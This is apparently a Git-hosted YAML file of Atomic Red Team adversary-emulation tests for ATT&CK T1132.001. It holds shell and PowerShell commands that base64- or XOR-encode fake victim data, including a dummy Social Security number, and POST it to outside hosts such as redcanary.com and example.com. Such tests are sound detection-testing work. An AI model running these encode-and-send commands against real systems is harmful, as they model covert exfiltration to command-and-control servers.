adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team-gs/atomics/T1132.001/T1132.001.yaml
T
Hare Sudhan 62a85c12b5 FreeBSD changes (#2585) 
* freebsd changes

* renaming freebsd to linux
2023-11-06 17:41:43 -05:00

85 lines
2.8 KiB
YAML
Raw Permalink Blame History

attack_technique: T1132.001
display_name: 'Data Encoding: Standard Encoding'
atomic_tests:
- name: Base64 Encoded data.
auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
description: |
Utilizing a common technique for posting base64 encoded data.
supported_platforms:
- macos
- linux
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: url
default: redcanary.com
base64_data:
description: Encoded data to post using fake Social Security number 111-11-1111.
type: string
default: MTExLTExLTExMTE=
executor:
command: |
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
name: sh
- name: Base64 Encoded data (freebsd)
auto_generated_guid: 2d97c626-7652-449e-a986-b02d9051c298
description: |
Utilizing a common technique for posting base64 encoded data.
supported_platforms:
- linux
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: url
default: redcanary.com
base64_data:
description: Encoded data to post using fake Social Security number 111-11-1111.
type: string
default: MTExLTExLTExMTE=
dependency_executor_name: sh
dependencies:
- description: |
Requires curl
prereq_command: |
if [ -x "$(command -v curl)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
pkg install -y curl
executor:
command: |
echo -n 111-11-1111 | b64encode -r -
curl -XPOST #{base64_data}.#{destination_url}
name: sh
- name: XOR Encoded data.
auto_generated_guid: c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
description: |
XOR encodes the data with a XOR key.
Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f
supported_platforms:
- windows
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: url
default: example.com
plaintext:
description: Plain text mimicking victim data sent to C2 server.
type: string
default: Path\n----\nC:\Users\victim
key:
description: XOR key used for encoding the plaintext.
type: string
default: abcdefghijklmnopqrstuvwxyz123456
executor:
command: |
$plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
$key = "#{key}"
$cyphertext = @();
for ($i = 0; $i -lt $plaintext.Count; $i++) {
$cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive
name: powershell
Reference in New Issue View Git Blame Copy Permalink